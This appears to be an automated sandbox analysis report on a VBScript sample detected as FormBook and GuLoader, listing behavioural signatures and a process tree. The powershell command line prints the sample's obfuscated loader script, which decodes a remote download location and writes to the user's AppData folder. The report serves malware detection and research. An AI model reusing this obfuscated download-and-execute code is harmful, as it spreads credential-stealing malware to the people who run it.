Edit tour
Windows
Analysis Report
IMG-466573885783553Folketingsmedlemmers.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6372 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\IMG-4 6657388578 3553Folket ingsmedlem mers.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Radiosen der='Sub'; $Radiosend er+='strin ';$Knnest = 1;$Radio sender+='g ';Function Beshout($ Solurenes) {$Strejfto gters=$Sol urenes.Len gth-$Knnes t;For($Ove rskringers =5;$Oversk ringers -l t $Strejft ogters;$Ov erskringer s+=6){$Neo dadaism+=$ Solurenes. $Radiosend er.Invoke( $Overskri ngers, $Kn nest);}$Ne odadaism;} function L ovbundnes( $Yttria){ . ($A fskalninge rnes) ($Yt tria);}$Pi ggy=Beshou t 'MrtelM Kr.dotckno zOversi .a lil.angslI traa Woma /Hjemm5Ust em.Battl0B yudv Fr,g( ndeWHaand iSkrannTan krdForgroA dvokwAtrop sPiske Pne mNpandoT. tuts bane1 dap0 Copy .Sei.m0 Ny re;Procu , ropWPr,exi fleyenmont a6Dou l4 D ri,;S bco TorvexUafv r6Kooke4Re p.e;Ensur Afrakrting svEcaud:.r tho1Tele,2 Micro1,pun k.Dvelr0co mpl)Duboi UnameG .ds keFreskcde sidkForumo S.fte/Rd,p r2Kbenh0In dre1Topvi0 Vaag.0Char l1Batho0Re ver1Aureg encodF Bel iDvrgtrBa stieK,ydsf Indlgohemi cxsigna/ac ,ep1 odvi2 .jalt1vand f.Hulen0,a tes ';$For maliaers=B eshout 'fu gtpUSkiljs .ippeeSliv orKnobk-Gl desANonirg Coxiee Lag nIdenttPo .ku ';$Gem =Beshout ' Opadgh Val gtDivertco untpFortss Rigm.:Be,p o/vr.ss/Ne oterMethea Pyramm Bor ti ZikkrMa nyreFunktx ,awmi.Fore dr Treso A fpu/antirR Tradeu.oma tt.seudsIn devcGimpmh ast,re No. fbLkk,raFy rstndokhme RecresR le g.ZabraqJu stuxMidved Minco ';$M orsomheder nes78=Besh out ' Pli. >Bemr, ';$ Afskalning ernes=Besh out 'Cou,t iBombaeFor ,lx,obbe ' ;$Uniforme rne='Requi sites';$Ge neralisere de135 = Be shout 'Mn treSildecD ynamhFremf o Herr Shr i%Udrk a F ,nspSyc.pp PasswdBade saKok etBr o,eaNedry% Stand\Skan ,MBal.ie P reft istaa KrngecBidr aaKlororSe ashpBe hia UlulalIleo ssPloto.Fo rdoTFoto o Sea akRepr e Rumfr&.l tfo&Proce ViolieSeer ,cInterh t dfaoT,lst Pomatt Fll e ';Lovbun dnes (Besh out 'Manip $NetstgDur omlCountoD eathbSalgs aStor.lSup er:AlloyBB nbrlSpe.l a Linif Ok etf Pro,eH als,rSydve e Kla.nAtl as=Rangl(B rokkcMal,k mAcftsdErr at Polit/G iantcDesm. usdy$B ka gGPer.eeUr o.tn flete czardrPret ea VaerlBu ff,i Korps FinureBre. srLderveSl oucdR.gnbe Bando1Ordn a3 I,el5Fr e,s) Bowl ');Lovbund nes (Besho ut 'Kilde$ VaaggHumo ul trusoCo m,ebPagura kritelBynr t:TorsoMSk ibsa deras GuimpsCent iaSenagcSu ctirForhae emmagd Cad e= Amor$Ca rdiG Avlse AcidbmChr. s.DronnsSm altpLevnel ChariChin ctBurme( G oni$BowldM .angeoS,mm er issisSt erooS,verm ProfihFane meBeggadDr akme Xemer .erienextr aeKonomsS. per7 amle8 Verde)Kaf, e ');$Gem= $Massacred [0];$Benzy ls= (Besho ut ' Four$ Brn gg D g gl RokaoCo arcbH.ndga Samlel.ilg o: ReflG D ispeAmar n AvereIore tr opt,iHo os c Mi da AfkrflUnde rlPorceyHy per= .estN Sortle Rat gwSlhun-Si nliO Raceb DaabsjHals seStandc l